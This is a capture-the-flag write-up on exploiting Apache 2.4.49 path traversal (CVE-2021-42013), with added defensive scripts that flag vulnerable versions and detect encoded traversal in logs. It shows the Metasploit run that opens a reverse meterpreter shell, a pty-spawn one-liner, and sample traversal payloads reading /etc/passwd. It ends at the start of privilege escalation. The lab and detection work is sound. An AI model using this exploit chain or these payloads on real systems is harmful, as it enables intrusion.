```
# Nmap 7.92 scan initiated Thu Mar 31 20:00:05 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.10.56.13
Nmap scan report for 10.10.56.13
Host is up (0.040s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-title: Consult - Business Consultancy Agency Template | Home
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
|   Supported Methods: OPTIONS HEAD GET POST TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 31 20:02:30 2022 -- 1 IP address (1 host up) scanned in 144.91 seconds
```
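The two things in that scan a defender should act on are the Apache version and the TRACE method. The following is an added example (not code from the original writeup) that parses the port table of nmap's normal output, attaches each script's output to its port, and turns the version string into a concrete finding. The scan excerpt embedded in it is copied from the output above; the version-to-CVE mapping is public advisory data (2.4.49 is affected by CVE-2021-41773 and CVE-2021-42013, 2.4.50 by CVE-2021-42013, both fixed in 2.4.51).

```python
"""Parse nmap normal output and flag findings worth a ticket.
Added example, not part of the original writeup."""
import re

# Port table taken from the nmap run shown above (trimmed to the relevant lines).
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods:
|   Supported Methods: OPTIONS HEAD GET POST TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
"""

# Apache httpd releases affected by the path-normalisation bugs:
# 2.4.49 -> CVE-2021-41773 (fixed in 2.4.50, whose fix CVE-2021-42013 bypasses)
# 2.4.49 and 2.4.50 -> CVE-2021-42013 (fixed in 2.4.51)
APACHE_PATH_NORMALIZATION_CVES = {
    "2.4.49": ["CVE-2021-41773", "CVE-2021-42013"],
    "2.4.50": ["CVE-2021-42013"],
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
APACHE_VERSION = re.compile(r"Apache httpd (\d+\.\d+\.\d+)")


def parse_ports(text):
    """Return one dict per port line; NSE script lines ('|' prefixed)
    are attached to the port that precedes them."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def assess(ports):
    """Produce (port, finding) tuples for open ports with a known issue."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        m = APACHE_VERSION.search(p["version"])
        if m:
            for cve in APACHE_PATH_NORMALIZATION_CVES.get(m.group(1), []):
                findings.append((p["port"],
                                 f"Apache httpd {m.group(1)} is affected by {cve}; "
                                 f"upgrade to 2.4.51 or later"))
        for s in p["scripts"]:
            if s.startswith("Potentially risky methods:") and "TRACE" in s:
                findings.append((p["port"],
                                 "HTTP TRACE is enabled; set 'TraceEnable off'"))
    return findings


if __name__ == "__main__":
    for port, finding in assess(parse_ports(NMAP_OUTPUT)):
        print(f"{port}/tcp: {finding}")
```

Run against the scan above this yields three findings on port 80: the two CVEs for 2.4.49 and the TRACE method. Version banners can be edited or hidden (`ServerTokens Prod`), so the version check is a triage signal, not proof; the authoritative check is the package version on the host.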
```
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        CVE-2021-42013   yes       The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013)
   DEPTH      5                yes       Depth for Path Traversal
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     ohmyweb.thm      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cgi-bin         yes       Base path
   VHOST                       no        HTTP server virtual host

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.19.77       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Dropper)

msf6 exploit(multi/http/apache_normalize_path_rce) > run

[*] Started reverse TCP handler on 10.9.19.77:4444
[*] Using auxiliary/scanner/http/apache_normalize_path as check
[+] http://10.10.56.13:80 - The target is vulnerable to CVE-2021-42013 (mod_cgi is enabled).
[*] Scanned 1 of 1 hosts (100% complete)
[*] http://10.10.56.13:80 - Attempt to exploit for CVE-2021-42013
[*] http://10.10.56.13:80 - Sending linux/x64/meterpreter/reverse_tcp command payload
[*] Sending stage (3020772 bytes) to 10.10.56.13
[*] Meterpreter session 1 opened (10.9.19.77:4444 -> 10.10.56.13:45242 ) at 2022-03-31 20:20:57 +0200
[!] This exploit may require manual cleanup of '/tmp/wAIYJ' on the target
```
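What this run leaves behind on the server side is a request to `/cgi-bin` whose path only resolves to a traversal after percent-decoding, which is why a plain string match on `..` in the access log misses it. The following is an added example (not part of the original writeup) of the detection logic a defender would run over Apache access logs: it percent-decodes the request path repeatedly until it stops changing, then flags any request that contains a `..` segment after decoding. The log lines are constructed for the example, not taken from the box, and the combined log format is assumed.

```python
"""Flag access-log requests whose decoded path contains a '..' segment.
Added example, not part of the original writeup; sample lines are constructed."""
import re
from urllib.parse import unquote

# Constructed combined-format lines: a benign request, a single-encoded
# traversal, a double-encoded traversal, and a plain '..'.
SAMPLE_LOG = r'''
10.9.19.77 - - [31/Mar/2022:20:10:01 +0200] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.9.19.77 - - [31/Mar/2022:20:20:55 +0200] "POST /cgi-bin/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1042 "-" "curl/7.81.0"
10.9.19.77 - - [31/Mar/2022:20:20:56 +0200] "POST /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1042 "-" "curl/7.81.0"
10.9.19.77 - - [31/Mar/2022:20:21:00 +0200] "GET /images/../index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
'''

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=5):
    """Percent-decode until the string stops changing, so double (or deeper)
    encoding cannot hide a dot segment. max_rounds bounds the work per line."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True if any segment of the decoded request path (query string
    dropped) is exactly '..'."""
    decoded = fully_decode(path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))


def scan_log(text):
    """Return (line_no, method, raw_path, decoded_path) for each suspicious
    request; line numbers are 1-based over the non-empty input."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        raw = m.group("path")
        if is_traversal(raw):
            hits.append((n, m.group("method"), raw, fully_decode(raw)))
    return hits


if __name__ == "__main__":
    for n, method, raw, decoded in scan_log(SAMPLE_LOG):
        print(f"line {n}: {method} {raw} -> {decoded}")
```

Lines 2 to 4 are flagged, line 1 is not. A patched Apache collapses a plain `/images/../index.html` harmlessly, so that hit is noise an analyst will dismiss quickly; the encoded forms are the ones that survived normalisation on 2.4.49 and are the signal. Combine with the `mod_cgi` angle from the check output: a POST to `/cgi-bin` that decodes to a traversal and returns 200 is the shape to alert on, and rotating logs to a central store matters because the writeup's own session shows the attacker gets a shell on the box that holds them.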
We are running as the user daemon:

```
meterpreter > shell
Process 146 created.
Channel 1 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
python3 -c 'import pty;pty.spawn("/bin/bash")'
daemon@4a70924bafa0:/bin$
```
## Elevation of privilege (EoP): from daemon to root (docker)

We don't see any non-daemon user in /home or /etc/passwd.

There is a /.dockerenv file, which confirms we are inside a Docker container.

Either with linpeas or with getcap we can find binaries that have file capabilities set.